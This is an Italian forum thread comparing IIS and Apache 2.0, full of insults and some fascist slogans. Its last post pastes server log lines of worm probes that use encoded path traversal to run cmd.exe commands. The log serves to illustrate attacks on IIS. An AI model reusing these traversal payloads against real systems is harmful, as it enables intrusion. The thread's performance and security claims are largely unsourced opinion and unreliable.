          intendo, ma la sola tecnologia) da Apache
          2.0, il ché è legale; cioè ha inseguito. Ora
          siccome il progetto iis non eccele in
          sicurezza, l'aver implementato nuove
          tecnologie, credo che lo penalizzerà di
          molto soprattutto all'inizio rispetto ad
          Apache 2.0, e molti hack e crack saranno
          pronti ad approfittarne.nonon ha preso nulla da apche 2.Ha introdotto ad esempoi i pool per le applicazioni.Cio' vuol dire che ogni applicazione web avra' ilproprio pool di thread, separato dagli altri e le sue impostazioni sulla dimensione del pool, sulla durata dei thread, sul loro riuso etc. etc.Inoltre IIS 6 integra alcuni tool di MS per migliorare la sicurezza come iislockdown e UrlScan, oltre ad aver drasticamente migliorato le permission di default, rendendole piu' restrittive e quindi piu' sicure.Ciao
          • Anonimo scrive:
            Re: Apache 2.0
            - Scritto da: maks
            UrlScan, oltre ad aver drasticamente
            migliorato le permission di default,
            rendendole piu' restrittive e quindi piu'
            sicure.Ed occorreva arrivare alla versione 6 per questa modifica ridicola?
          • Anonimo scrive:
            Re: Quanto costa ?


            UrlScan, oltre ad aver drasticamente

            migliorato le permission di default,

            rendendole piu' restrittive e quindi piu'

            sicure.

            Ed occorreva arrivare alla versione 6 per
            questa modifica ridicola?ci vogliono 4 anni a fare un server web multithreaded?boh.. non capisco dove volete arrivare con queste polemiche sterili...
          • Anonimo scrive:
            Re: Apache 2.0

            Ha introdotto ad esempoi i pool per le
            applicazioni.
            Cio' vuol dire che ogni applicazione web
            avra' il
            proprio pool di thread, separato dagli altri
            e le sue impostazioni sulla dimensione del
            pool, sulla durata dei thread, sul loro
            riuso etc. etc.ah bhe tanto ormai l'hardware...funzionerebbe sul enterprise ????
            Inoltre IIS 6 integra alcuni tool di MS per
            migliorare la sicurezza come iislockdown e
            UrlScan, oltre ad aver drasticamente
            migliorato le permission di default,
            rendendole piu' restrittive e quindi piu'
            sicure.e aparte questo ???? mah iss6 che storia...forza tirate fuori i soldi...
          • Anonimo scrive:
            Re: Quanto costa ?


            Ha introdotto ad esempoi i pool per le

            applicazioni.

            Cio' vuol dire che ogni applicazione web

            avra' il

            proprio pool di thread, separato dagli
            altri

            e le sue impostazioni sulla dimensione del

            pool, sulla durata dei thread, sul loro

            riuso etc. etc.
            ah bhe tanto ormai
            l'hardware...funzionerebbe sul enterprise
            ????parlare italiano no eh? :)


            Inoltre IIS 6 integra alcuni tool di MS
            per

            migliorare la sicurezza come iislockdown e

            UrlScan, oltre ad aver drasticamente

            migliorato le permission di default,

            rendendole piu' restrittive e quindi piu'

            sicure.
            e aparte questo ????
            mah iss6 che storia...forza tirate fuori i
            soldi...
            ma quali soldi?io non sto dicendo che IIS 6 sia il non plus ultra, ma che apache 2 era un progetto obbligato, visto che ormai era apache ad essere indietro anni luce rispetto agli altri.Ora con la versione 2 (quando uscira' ufficialmente) si sono messi allo stesso livello, non anni luce avanti agli altri, come ha detto qualcuno.Ciao
    • Anonimo scrive:
      Ma sei troppo comico (come BSD tra l'altro!!!)

      In prima battuta un sistema win/iis è
      meno costoso di un sistema UNIX/iis. Ma in un altra notizia acclamavi al fascino dell'essere gratuito (o quasi) dei prodotti Linux/Unix !?!?! DECIDITI
      Il punto è li, si è scelto di non fornire un
      super servizio, ma un servizio sufficiente,
      abbassando i costi cosi.Sei davvero sicuro che quello che costa meno sia di conseguenza più scarso? Allora le cose gratuite dovrebbero essere delle cacche !!!
      Quindi l'arrivo di Apache 2.0 dovrebbe, in
      teoria, distanziare definitivamente iis. Babbo Natale passa una volta sola...la notte fra il 24 e il 25 dicembre !!!
      In
      teoria, perchè purtroppo nel mondo squallido
      dell'economia, non sempre si punta sul
      prodotto che offre migliori performance e
      nuove e più tecnologie, anche se questo è
      gratuito.Ma se hai detto che fa parte di sistemi più costosi ?!?!?! DECIDITIIIIII
      Cmq, anche se Apache 2.0 non eliminerà
      definitivamente iis, dovrebbe ridurre di
      molto la sua presenza sul mercato.Ti ho già detto quando passa Babbo Natale?----------------------------------------Ordine, Amore per la Patria e Disciplina----------------------------------------
      • Anonimo scrive:
        Re: Ma sei troppo comico (come BSD tra l'altro!!!)
        So già che mi beccherò, la X, ma quando ci vuole ci vuole...- Scritto da: .NET-tuno
        Ordine, Amore per la Patria e DisciplinaFAN CULO, DEFICIENTE!
        • Anonimo scrive:
          Re: Ma sei troppo comico (come BSD tra l'altro!!!)
          - Scritto da: il matto
          So già che mi beccherò, la X, ma quando ci
          vuole ci vuole...

          - Scritto da: .NET-tuno

          Ordine, Amore per la Patria e Disciplina

          FAN CULO, DEFICIENTE!Uh, a me sembrava la frase scritta sulle magliette di Grunf del gruppo TNT... sai quello che inventava qualsiasi cosa... salvo che si rompeva un'attimo dopo (un po' come IIS insomma ;)
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: Dixie

            - Scritto da: .NET-tuno


            Ordine, Amore per la Patria e


            Disciplina
            Uh, a me sembrava la frase scritta sulle
            magliette di Grunf del gruppo TNT... sai
            quello che inventava qualsiasi cosa... salvo
            che si rompeva un'attimo dopo (un po' come
            IIS insomma ;)No, è la frase di uno che non sa ragionare con la propria testa e allora ricorre a slogan prestampati
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)

            Uh, a me sembrava la frase scritta sulle
            magliette di Grunf del gruppo TNT... sai
            quello che inventava qualsiasi cosa... salvo
            che si rompeva un'attimo dopo (un po' come
            IIS insomma ;)Mitico! non sono l'unico a leggere Alan Ford :)Cmq quelli che sostengono IIS non riesco a capirli. Anch'io, purtroppo, uso IIS al lavoro (l'azienda vuole così), ma sono sempre a dire peste e corna su questa ciofeca... insomma, perché vi accanite su Apache, un prodotto free (in tutti i sensi, non come quella birra gratis di IIS) stabile, veloce e sicuro?Io non capisco... o vi paga la M$ o siete mona! ;)byeZ!
      • Anonimo scrive:
        Re: Ma sei troppo comico (come BSD tra l'altro!!!)
        - Scritto da: .NET-tuno

        In prima battuta un sistema win/iis è

        meno costoso di un sistema UNIX/iis.

        Ma in un altra notizia acclamavi al fascino
        dell'essere gratuito (o quasi) dei prodotti
        Linux/Unix !?!?! DECIDITI


        In

        teoria, perchè purtroppo nel mondo
        squallido

        dell'economia, non sempre si punta sul

        prodotto che offre migliori performance e

        nuove e più tecnologie, anche se questo è

        gratuito.

        Ma se hai detto che fa parte di sistemi più
        costosi ?!?!?! DECIDITIIIIIISembra che dall'alto della tua esperienza tu non conosca la differenza tra prezzo di un prodotto e costo di esercizio...
        • Anonimo scrive:
          Re: Ma sei troppo comico (come BSD tra l'altro!!!)

          Sembra che dall'alto della tua esperienza tu
          non conosca la differenza tra prezzo di un
          prodotto e costo di esercizio...Allora dal basso della vostra incoerenza si evince che spesso parlate giusto per far sfogare i due neuroni che litigano nella vostra testolina. Più di una volta ho letto lementele circa i prezzi dei sistemi operativi Microsoft e ora leggo che nonostante il basso prezzo iniziale a lungo andare un sistema unix/linux è più costoso da mantenere...wow che belli che siete quando vi contraddite. Ma tornate al centro sociale a fare teatro e balli gitani.---------------------------------------------------Meglio sovrani all'inferno che schiavi in paradiso---------------------------------------------------
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: .NET-tuno
            quando vi contraddite. Ma tornate al centro
            sociale a fare teatro e balli gitani.ecco un altro ragazzino che identifica GNU/Linux con la sinistra e M$ con la destra, informarti meglio no e'? E magari sei convinto che GNU/Linux sia gratis e che 'free software = software gratuito' vero?
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)

            ecco un altro ragazzino che identifica
            GNU/Linux con la sinistra e M$ con la
            destra, informarti meglio no e'? E magari
            sei convinto che GNU/Linux sia gratis e che
            'free software = software gratuito' vero?.....e magari crede pure che copyright è la licenza della destra fascista e copyleft quella della sinistra comunista.CiaoGianni
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: z2
            - Scritto da: .NET-tuno

            quando vi contraddite. Ma tornate al
            centro

            sociale a fare teatro e balli gitani.
            ecco un altro ragazzino che identifica
            GNU/Linux con la sinistra e M$ con la
            destra, informarti meglio no e'? E magari
            sei convinto che GNU/Linux sia gratis e che
            'free software = software gratuito' vero?E' una dura realta' ma e' cosi'.Gli unici che hanno settimane da perdere nell'apprendimento di linux/unix quando possonoavere di piu' in tempo 0 pagando MS, sonogli studentelli del liceo e/o universiterariche grattandosi le palle tutto il giornonon hanno altro da fare che trovarsiHOBBY del cazzo.Ovviamente in attesa di andare a ballareattorno al fuoco nelle case occupate..
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: asdf
            E' una dura realta' ma e' cosi'.
            Gli unici che hanno settimane da perdere
            nell'
            apprendimento di linux/unix quando possono
            avere di piu' in tempo 0 pagando MS, sono
            gli studentelli del liceo e/o universiterari
            che grattandosi le palle tutto il giorno
            non hanno altro da fare che trovarsi
            HOBBY del cazzo.ok quando vuoi fare un discorsetto serio su varieta' e diffeomorfismi fammi un fischio e vediamo chi si gratta e chi trolleggia.
            Ovviamente in attesa di andare a ballare
            attorno al fuoco nelle case occupate..mai stato in una casa occupata e seppur non siano affari tuoi non sono neanche di sinistra, cio' nondimeno uso GNU/Linux e sostengo il free software (che ripeto non e' software gratis);Inoltre in quali 'hobby' io impieghi il mio tempo non ritengo siano affari tuoi, quindi cortsemente astieniti da ulteriori commenti trolleggianti (fai piu' bella figura).
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: .NET-tuno
            Meglio sovrani all'inferno che schiavi in
            paradisoFAN CULO DEFICIENTE!impara a ragionare con la tua testa invece di andare avanti per slogan
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: .NET-tuno
            ---------------------------------------------
            Meglio sovrani all'inferno che schiavi in
            paradiso
            ---------------------------------------------Aspetta, ne ho uno io:--------------------------Si lavora e si faticaPer la panza e per la ficaE quello che avanzaPer la fica e per la panza--------------------------;-PSalutiCo.Bra.
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: Co.Bra.
            --------------------------
            Si lavora e si fatica
            Per la panza e per la fica
            E quello che avanza
            Per la fica e per la panza
            --------------------------Co.Bra. RULEZ!!! :o)
          • Anonimo scrive:
            Re: Ma sei troppo comico (come BSD tra l'altro!!!)
            - Scritto da: .NET-tuno

            Sembra che dall'alto della tua esperienza
            tu

            non conosca la differenza tra prezzo di un

            prodotto e costo di esercizio...

            Allora dal basso della vostra incoerenza si
            evince che spesso parlate giusto per far
            sfogare i due neuroni che litigano nella
            vostra testolina. Più di una volta ho letto
            lementele circa i prezzi dei sistemi
            operativi Microsoft e ora leggo che
            nonostante il basso prezzo iniziale a lungo
            andare un sistema unix/linux è più costoso
            da mantenere...wow che belli che siete
            quando vi contraddite. Ma tornate al centro
            sociale a fare teatro e balli gitani.1. Non ho espresso le opinioni che mi stai attribuendo.2. Siccome sono d'accordo con il matto non vale la pena ragionare oltre con te.
      • Anonimo scrive:
        Re: Ma sei troppo comico (come BSD tra l'altro!!!)
        trollallà trollallà trollallallàquesto è il valzer del trollerino...
      • Anonimo scrive:
        Re: Ma sei troppo comico (come BSD tra l'altro!!!)
        Ma sai leggere ciò che scrivono gli altri?Ho detto che in prima battuta win/iis è meno costoso di UNIX/Apache; poi è dopo l'installazione che si vedono le differenze; a parità di servizio (e parliamo solo di altissima qualità di servizio con UNIX/Apache, non media o bassa) in rapporto all'hw; un sistema UNIX/Apache è meno costoso di un sistema win/iis.Il punto è che qualità di servizio si vuole offrire; se si è disposti a scendere, come qualità e cmq non è possibile con UNIX/Apache, sicuramente si risparmia ma scende la qualità. Poi a qualità basse i sw M$ non hanno concorrenti, poichè i prodotti su UNIX non scendono come qualità e di conseguenza come costo.Il rapporto è sempre prezzo qualità nel complesso, non nella fase iniziale dove win/iis ovviamente vince e in qualità scarse dove non ha concorrenti.Leggi meglio, con più calma, non c'è contraddizione.
        • Anonimo scrive:
          Re: Ma sei troppo comico (come BSD tra l'altro!!!)
          - Scritto da: BSD_like
          Ma sai leggere ciò che scrivono gli altri?[...]Guarda che sei tu che non sai scrivere."Il rapporto è sempre prezzo qualità nel complesso, non nella fase iniziale dove win/iis ovviamente vince e in qualità scarse dove non ha concorrenti.""Il punto è che qualità di servizio si vuole offrire; se si è disposti a scendere, come qualità e cmq non è possibile con UNIX/Apache, sicuramente si risparmia ma scende la qualità."ciaociao
    • Anonimo scrive:
      DAVVERO GRAZIE
      Grazie, siete degli amici. Non avrei mai immaginato che dei professionisti seri ed impegnati come voi sarebbero riusciti a trovare tutto questo tempo per rispondere ad una mia provocazione. Siete dei grandi, istruiti, professionalmente preparati e mi fa piacere che per voi conti più la politica che la tecnica in un forum informatico. DAVVERO BRAVI!Per chi mi accusa di non ragionare con la mia testa vorrei solo far notare che le parole: popolo, massa e comune non sono certo consuetudini di un gergo di destra. Ma questa è politica e so che a voi non interessa.--------------DUX IMPERAT--------------
      • Anonimo scrive:
        Re: DAVVERO GRAZIE
        - Scritto da: .NET-tuno
        DUX IMPERATFAN CULO DEFICIENTEnon hai dimostrato di ragionare: continui a riproporre idioti luoghi comuni
        • Anonimo scrive:
          Re: DAVVERO GRAZIE
          tu invece ti stai dimostrando un altruista disposto al dialogo e alla ragione. Davvero un esempio di come certi ideali di lotta di classe vanno portati a termine fino in fondo. Sei forse di Bologna e vai in giro a sparare alle persone?c:
          ping ilmattoRequest timed out.Request timed out.Request timed out.Request timed out.--------------------------------ITALIA AGLI ITALIANI--------------------------------
          • Anonimo scrive:
            Re: DAVVERO GRAZIE
            FAN CULO DEFICIENTE# traceroute brain.NET-tunotraceroute: unknown host brain
          • Anonimo scrive:
            Re: DAVVERO GRAZIE
            Sei troppo scemo per essere vero.- Scritto da: .NET-tuno
            tu invece ti stai dimostrando un altruista
            disposto al dialogo e alla ragione. Davvero
            un esempio di come certi ideali di lotta di
            classe vanno portati a termine fino in
            fondo. Sei forse di Bologna e vai in giro a
            sparare alle persone?

            c:
            ping ilmatto

            Request timed out.
            Request timed out.
            Request timed out.
            Request timed out.

            --------------------------------
            ITALIA AGLI ITALIANI
            --------------------------------
          • Anonimo scrive:
            [OT] Dove sono i censori?
            - Scritto da: .NET-tuno
            fondo. Sei forse di Bologna e vai in giro a
            sparare alle persone?Qui c'e` uno che inneggia al fascismo e da` del terrorista ad un altro... e la censura scatta solo per dei banali "fan culo"?Sveglia censori! O non censurate nessuno, oppure tutti quelli che insultano.
      • Anonimo scrive:
        Re: DAVVERO GRAZIE
        leggi qua per favore:http://punto-informatico.it/pol.asp?mid=165885&fid=39675p.s. destra e sinistra sono solo costrutti sociali non hanno un valore assoluto, sveglia!
      • Anonimo scrive:
        Re: DAVVERO GRAZIE
        - Scritto da: .NET-tuno
        Siete dei grandi,
        istruiti, professionalmente preparati e mi
        fa piacere che per voi conti più la politica
        che la tecnica in un forum informatico.-1a contraddizioneLa politica l'hai tirata in ballo tu, parlando a sproposito di centri sociali.
        Per chi mi accusa di non ragionare con la
        mia testa vorrei solo far notare che le
        parole: popolo, massa e comune non sono
        certo consuetudini di un gergo di destra.-2a contraddizione.I termini "popolo" e "massa" sono consuetutidini di qualsiasi totalitarismo (per es. i raduni oceanici che si tenevano in italia e germania prima della 2a G.M.), destra o sinistra che sia. E comunque stai ancora tirando in ballo la politica, eppure hai appensa ricordato che siamo in un forum infomatico.
        Ma
        questa è politica e so che a voi non
        interessa.-3a contraddizioneMa non avevi detto che la politica l'avevamo tirata in ballo noi? Com'è che adesso non ci interessa +?Che troll fallito...
        • Anonimo scrive:
          Re: DAVVERO GRAZIE
          - Scritto da: Ender
          Che troll fallito...Magari fosse un troll, almeno quelli lo fanno per divertirsi. Questo è solo un povero esaltato privo di materia grigia.
    • Anonimo scrive:
      Re: Apache 2.0
      - Scritto da: BSD_like
      La nuova relase di Apache porta con sè molte
      nuove tecnologie, che iis è indietro anni
      luce (e anche Zeus).
      Sarà un punto di svolta e M$ dovrà per forza
      rincorrere.Quali?se e' possibile saperlo...ciao
      • Anonimo scrive:
        Re: Apache 2.0
        - Scritto da: maks
        - Scritto da: BSD_like

        La nuova relase di Apache porta con sè

        molte

        nuove tecnologie, che iis è indietro anni

        luce (e anche Zeus).
        Quali?
        se e' possibile saperlo...Questo è un sistema aperto ed ovviamente è possibile sapere (quasi) tutto...http://httpd.apache.org/docs-2.0/new_features_2_0.html
      • Anonimo scrive:
        Re: Apache 2.0

        Quali?
        se e' possibile saperlo...http://httpd.apache.org/docs-2.0/new_features_2_0.html
        • Anonimo scrive:
          Re: Apache 2.0
          - Scritto da: blah

          Quali?

          se e' possibile saperlo...
          http://httpd.apache.org/docs-2.0/new_features

          la domanda era retorica...avendo gia' letto quel documento che non cambia dalla prima volta che e' apparso sul sito di apache, mi chiedo, cosa c'e' di cosi' rivoluzionario da renderlo "anni luce avanti agli altri?"mi chiedo ancora.. sara' il multithreading?non credo...sara' il layer multipiattaforma?idea vecchia... addirittura MS ha tirato fuori dei sorgenti del suo .net framework che funzionano su BSD (li ho provati)allora cosa sara' mai?l'ssl integrato (finalmente)o la possibilita' di filtrare le richieste?ditemelo voi, perche' io non l'ho capito
          • Anonimo scrive:
            Re: Apache 2.0

            ditemelo voi, perche' io non l'ho capitoio non ho detto che sono rivoluzionarie, comunque si migliora quello che c'e gia...se non vuoi usare non usarlo e basta...comunque zeus mi pare migliore di tutti gli altri, ma purtroppo non e gratuito... ;-(inoltre nemmeno l'iss ha chissa che migliorie spettacolari, quindi...
          • Anonimo scrive:
            Re: Quanto costa ?


            ditemelo voi, perche' io non l'ho capito
            io non ho detto che sono rivoluzionarie,
            comunque si migliora quello che c'e gia...
            se non vuoi usare non usarlo e basta...
            comunque zeus mi pare migliore di tutti gli
            altri, ma purtroppo non e gratuito...
            ;-(
            inoltre nemmeno l'iss ha chissa che
            migliorie spettacolari, quindi...sono d'accordoinfatti la domanda era rivolta direttamente a BSD_Like che diceva "apache 2 e' tecnologicamente anni luce avanti agli altri", e diceva che apache 2 avrebbe fatto le scarpe a tutti gli altri server.Non credo sia cosi', non credo che ci sia un server tanto avanti agli altri, credo che l'avanzata di IIS sia dovuta in primo luogo ad accordi commerciali, cosa che apache non puo' permettersi,in secondo luogo alla maggiore stabilita' di windows 2000 rispetto ai sistemi precedenti.Ciao
          • Anonimo scrive:
            Re: Quanto costa ?
            Non sò cosa intendi per rivoluzionario, io cmq ho inteso dire che starà davanti a iis, non che sarà qualcos'altro.Ma il vantaggio migliore di Apache su iis è che finalmente surclassa definitivamente iis su win (non stò rapportandomi al nuovo, di cui le specifiche sono note a M$) in performance.Questo vuol dire che rispetto all'attuale iis è migliore anche su win (dapprima lo era l'accoppiata UNIX/Apache); per intedenci uno studio fatto da un'ist. gov. svizzero, dava Apache quasi il doppio più veloce di iis; ma è da considerare che in max. parte i siti su cui gira Apache sono in server UNIX. Ora con queste premesse può superare iis anche su win (non dimentichiamo che è un sw nato su UNIX).Queste considerazioni, sono ovv. per l'attuale iis, quello futuro le conosce solo M$.Poi, daccordo che la domanda è per me, ma mica posso stare 24/24 ore gg. sui forum di PI.Cmq concordo che, soprattutto per i servizi web ad alta qualità, iis gode per lo più di poltiche di marketing sostenute da M$.Alcuni mesi fà si discuteva, invece, sulla percentuale che Apache aveva rosicchiato a iis, ma allora le società di web clienti/serventi, passavano a Apache da iis per i noti e annosi problemi di security di iis; ultimamente gli hack e i crack. hanno abbassato gli attacchi contro i server win/iis (inutile nasconderlo, si preferisce attaccare questi, non solo perchè meno sicuri), e sono snche diminuiti i virus che sfruttano le deficienze di iis.Molto probabilmente, questo dispiegamento di server fatto (perlo più da esigenze di marketing che da considerazioni tecniche e/o economiche), potrebbe spingere gli hack e i crack ad attaccare di nuovo in forza i server win/iis; senza contare i virus che potrebbero rifiorire.
          • Anonimo scrive:
            Re: Quanto costa ?

            Non sò cosa intendi per rivoluzionario, io
            cmq ho inteso dire che starà davanti a iis,
            non che sarà qualcos'altro.
            Ma il vantaggio migliore di Apache su iis è
            che finalmente surclassa definitivamente iis
            su win (non stò rapportandomi al nuovo, di
            cui le specifiche sono note a M$) in
            performance.intendo questohttp://punto-informatico.it/pol.asp?mid=165724&fid=39675"La nuova relase di Apache porta con sè molte nuove tecnologie, che iis è indietro anni luce (e anche Zeus).Sarà un punto di svolta e M$ dovrà per forza rincorrere."mi chiedevo quali fossero queste tecnologie...
            Questo vuol dire che rispetto all'attuale
            iis è migliore anche su win (dapprima lo era
            l'accoppiata UNIX/Apache); per intedenci uno
            studio fatto da un'ist. gov. svizzero, dava
            Apache quasi il doppio più veloce di iis; ma
            è da considerare che in max. parte i siti su
            cui gira Apache sono in server UNIX. Ora con
            queste premesse può superare iis anche su
            win (non dimentichiamo che è un sw nato su
            UNIX).
            Queste considerazioni, sono ovv. per
            l'attuale iis, quello futuro le conosce solo
            M$.
            quello futuro io cell'ho qui installato....non dico che apache 2 sia una fregaturama che non ha niente di cosi' nuovo da far gridareal miracolo.E non credo neanche che sia piu' performante di IISForse in qualche test puo' esserlo, ma non in generale, nel caso medio.Ciao
          • Anonimo scrive:
            Re: Quanto costa ?
            Ti ripeto che mi riferisco a win; giudicare Apache su UNIX è indeterminabile, poichè lo UNIX ha un controllo della rete migliore di win, quindi se l'accoppiata UNIX/Apache è migliore di win/iis, non vuol dire che il merito sia di Apache.Poi, io mi fido dei ragazzi dell'open source, e degli ist. gov.; scusa, ma sembrano in generale più indipendenti.Mi fiderei anche di società comm., ma starei attento alle loro politiche di marketing, società indipendenti economicamente e tecnicamente da una società sw. Ad esempio Yahoo!!, il quale i test li ha fatti, e da quelli non a caso e risultato il miglior o.s FreeBSD e Apache come web server.Ad esempio non mi fiderei di Unisys, o in un'altro caso di IBM che parla di application server, come di Bea daltronde.
          • Anonimo scrive:
            Re: per non dire bugie sule performance
            http://aap.sourceforge.net/se apache 2 fosse stato il miglior server web del mondo queste cose non sarebbero state possibili.ciao
          • Anonimo scrive:
            Re: Quanto costa ?
            - Scritto da: BSD_like
            io
            cmq ho inteso dire che starà davanti a iis,
            non che sarà qualcos'altro.Siamo a livello mago Do Nascimento vedo.Parli con certezza da vera cartomante del futurovisto che l'articolo parla di IIS in salita e contemporaneamente di APACHE in discesa.
            Ma il vantaggio migliore di Apache su iis è
            che finalmente surclassa definitivamente iis
            su win (non stò rapportandomi al nuovo, di
            cui le specifiche sono note a M$) in
            performance.?
            Questo vuol dire che rispetto all'attuale
            iis è migliore anche su win (dapprima lo era
            l'accoppiata UNIX/Apache); per intedenci uno
            studio fatto da un'ist. gov. svizzero, dava
            Apache quasi il doppio più veloce di iis; maSu che macchine? Quali OS? Che versioni deisoftware in oggetto? Quale "ist. gov. svizzero"?Chi ha fatto i test? Con quali finalita'?
            è da considerare che in max. parte i siti su
            cui gira Apache sono in server UNIX. Ora con
            queste premesse può superare iis anche su
            win (non dimentichiamo che è un sw nato su
            UNIX).Infatti si parla di un bel -5% a fronte di un +5%ottime deduzioni le tue.
            Queste considerazioni, sono ovv. per
            l'attuale iis, quello futuro le conosce solo
            M$.Dovresti lavorare nel marketing. "Linux V9 e' 32143 volte piu' potente rispetto a MS-DOS 3.1"
            ultimamente gli hack e i crack. hanno
            abbassato gli attacchi contro i server
            win/iis Ti hanno telefonato? L'hai letto nelle carte?Ti si e' sciolto il sale nel bicchiere?
            Molto probabilmente, questo dispiegamento di
            server fatto (perlo più da esigenze di
            marketing che da considerazioni tecniche e/o
            economiche), potrebbe spingere gli hack e i
            crack ad attaccare di nuovo in forza i
            server win/iis; senza contare i virus che
            potrebbero rifiorire.Enfatizzerei il tuo geniale "MOLTO PROBABILMENTE - POTREBBE". Ciao Sibilla.
          • Anonimo scrive:
            Re: Quanto costa ?
            Io non insulto mai nessuno, ma per te posso fare un'eccezzione.Il testo del post è chiaro nell'insieme, com'è chiaro che quando parlo di prestazioni mi riferivo ad Apache sotto win. Se separi ogni singolo parte del post, per un post fatto nell'insieme, ottieni delle risposte separate.I test di cui mi fido, come detto sono quelli di organizzazioni ed ist. gov. recensiti su riviste del settore, non di società magarti pro-M$; e di organizzazioni open source.Quando parlo del fatto che gli attacchi a win/iis sono diminuiti, lo si desume dal fatto che sono diminuiti gli articoli (non solo di PI) che parlano di attacchi eclatanti a questi server.Ti ricordo, poi, che quasi un anno fà Apache ha incrementato la sua quota di quasi il 6% su iis, per i problemi di sicurezza di quest'ultimo.Certi metodi per smontare le argomentazioni lasciali a casa.
          • Anonimo scrive:
            Re: Quanto costa ?
            - Scritto da: BSD_like
            Il testo del post è chiaro nell'insieme,Forse per te.
            com'è chiaro che quando parlo di prestazioni
            mi riferivo ad Apache sotto win. Se separiForse per te.
            ogni singolo parte del post, per un post
            fatto nell'insieme, ottieni delle risposte
            separate.Sommando tante affermazioni generaliste e privedi senso senza alcun dato credibile dubito proprioche si ottenga qualcosa di sensato.
            I test di cui mi fido, come detto sono
            quelli di organizzazioni ed ist. gov.
            recensiti su riviste del settore, non diNon citi le fonti, non citi le specifiche dei testproponi solo chiacchiere da bar.
            società magarti pro-M$; e di organizzazioni
            open source.
            Quando parlo del fatto che gli attacchi a
            win/iis sono diminuiti, lo si desume dal
            fatto che sono diminuiti gli articoli (non
            solo di PI) che parlano di attacchi
            eclatanti a questi server.Questo si che mi sembra un parametro oggettivodi valutazione.ROTFL.
            Ti ricordo, poi, che quasi un anno fà Apache
            ha incrementato la sua quota di quasi il 6%
            su iis, per i problemi di sicurezza di
            quest'ultimo.E che ora ha perso il 5% su iis. Forse un motivoci sara' al di la delle tue "sensazioni" e deduzioni basate su numero di articoli e cazzatesimili.
            Certi metodi per smontare le argomentazioni
            lasciali a casa.Avessi bisogno di smontarle.. tu parli a livellosensitivo. Di argomentazioni, e' evidente, non ne hai mai avute.
          • Anonimo scrive:
            Re: Quanto costa ?
            Il post è chiaro per tutti, se non lo è per te, non lo scrivo a tua forma e somiglianza per farti piacere.Poi il fatto che gli attacchi a iis fossero diminuiti in base al concetto che non vi sono da tempo attacchi clamorosi era ovvio dal contesto (oltre che dall'affermazione) che è un mio convincimento, dato che è razionale.Poi mi hai costretto a ricercare parte dei link e dei siti che mi ricordavo sul tema in questione; una perdita di tempo per rispondere al tuo post.Siccome non posso ricordarmi tutto, men che meno gli indirizzi web; ma forse chi è allenato da M$ al masochismo di ripetere che iis e altra porcheria è cosa bupona, è allenato a ricordare masochisticamente gli indirizzi per far felice la sua società.Visto che gli indirizzi te li riporto, vista la fatica di ricercarli di nuovo, visto che avevo ragione sulle proposizioni che ho riportato, mi sembra giusto darti del c.....ne.Per sapere su come un'hack olandese ha compromesso grazie a iis il sito del Nasdaq, che ora gira su Linux/Apache (visti i precedenti) vai su:http://www.cnn.com/2000/TECH/computing/10/03/nasdaq.idg/index.htmlPer conoscere come i più grandi (anzi per renderti conto) come i più grandi operatori del web utilizzino FreeBSD (colonna portante di internet) e quindi Apache come web server:http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/05/29/BU20648.DTLinfine i test dell'ist. gov. svizzero condotti su 100 grandi siti internet svizzeri, ogni 5 minuti, per un periodo superiore ai 3 mesi, sono su (sempre che sai leggere il tedesco):http://www.heise.deVisto che i "begli indirizzi" che cerchi esistono, chi dice ca...te, rimani tu.Sei pregato di non rompere l'anima al prossimo dicendo che mente, etc., costringendo il prossimo a cercare link per smentirti, è penoso come mezzo per contraddire le tesi altrui.
    • Anonimo scrive:
      Re: Apache 2.0
      ...se mia nonna avesse avuto le ali...
  • Anonimo scrive:
    che tristezza....
    e' proprio vero... piu' fai cagare e piu' ti vogliono.
    • Anonimo scrive:
      Re: che tristezza....
      - Scritto da: munehiro
      e' proprio vero... piu' fai cagare e piu' ti
      vogliono.E' per lo stesso principio che Linux sta prendendo piede??
    • Anonimo scrive:
      Re: che tristezza l'invidia....
      - Scritto da: munehiro
      e' proprio vero... piu' fai cagare e piu' ti
      vogliono.WOW!Che commento tecnico!
      • Anonimo scrive:
        Re: che tristezza l'invidia....
        sara' ma io nei miei log continuo a trovare sta roba fai un po te:207.99.88.13 - - [25/Mar/2002:13:25:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:25 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 